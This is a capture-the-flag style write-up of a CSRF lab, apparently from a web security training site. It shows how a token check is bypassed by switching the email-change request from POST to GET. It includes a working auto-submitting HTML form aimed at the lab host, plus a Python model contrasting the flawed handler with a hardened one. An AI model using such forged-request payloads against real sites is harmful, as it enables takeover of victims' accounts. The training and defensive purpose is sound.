We logged in using the credentials that were given to us:

We could see that a csrf key was also sent along with the request when updating our email:

As in the previous lab, CSRF vulnerability with no defenses, we added a JavaScript tag to submit our request automatically and tidied the spacing using ChatGPT:

<!DOCTYPE html>
<html lang="en">
<head>
    <title>Form CSRF PoC</title>
</head>
<body>
    <h1>Form CSRF PoC</h1>
    <form method="POST" action="https://0a850080036f0b4a81930cda00680002.web-security-academy.net/my-account/change-email">
        <input type="hidden" name="email" value="hello@haha.com">
        <input type="hidden" name="csrf" value="TimXx6Y5XLn3SUIHUwmA5YmrUp2jY9te">
        <input type="submit" value="Submit Request">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

Our exploit worked when testing with the local exploit server:

However, sending the exploit to the victim didn’t solve our challenge.

We removed the csrf value and checked the exploit locally, but received the response below:

Changing the request method to GET bypassed that prompt, the email was changed, and the exploit worked:

No error message was generated:
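
The server-side behaviour these three requests point to, modelled beside a corrected handler. This is an added example, not code from the lab or from this write-up: the handler names, status codes, messages and the sample session (including its token) are constructed assumptions.

```python
import hmac

# Constructed sample session; the token is a placeholder, not a value from the lab.
SESSION = {"user": "tester", "email": "old@example.test", "csrf": "constructed-token-123"}


def token_ok(session, params):
    """Constant-time comparison of the submitted token with the session's token."""
    supplied = params.get("csrf", "")
    return hmac.compare_digest(supplied.encode(), session["csrf"].encode())


def change_email_flawed(method, session, params):
    """Models the observed behaviour: the token is only checked when the method is POST."""
    if method == "POST" and not token_ok(session, params):
        return 400, "Missing or invalid CSRF token"
    session["email"] = params["email"]  # a GET request reaches this line unchecked
    return 302, "email updated"


def change_email_hardened(method, session, params):
    """State changes are POST-only and the token is checked on every accepted request."""
    if method != "POST":
        return 405, "Method Not Allowed"
    if not token_ok(session, params):
        return 400, "Missing or invalid CSRF token"
    session["email"] = params["email"]
    return 302, "email updated"


def run_cases(handler):
    """Replay the three requests from the write-up against a handler."""
    cases = [
        ("POST", {"email": "a@example.test", "csrf": SESSION["csrf"]}),  # valid token
        ("POST", {"email": "b@example.test"}),                           # token removed
        ("GET", {"email": "c@example.test"}),                            # method switched
    ]
    results = []
    for method, params in cases:
        session = dict(SESSION)  # fresh copy of the session for each case
        status, _ = handler(method, session, params)
        results.append((method, status, session["email"]))
    return results


if __name__ == "__main__":
    for name, handler in (("flawed", change_email_flawed), ("hardened", change_email_hardened)):
        print(name, run_cases(handler))
```

With the hardened handler the GET request is refused before any state changes, so the email stays at its original value.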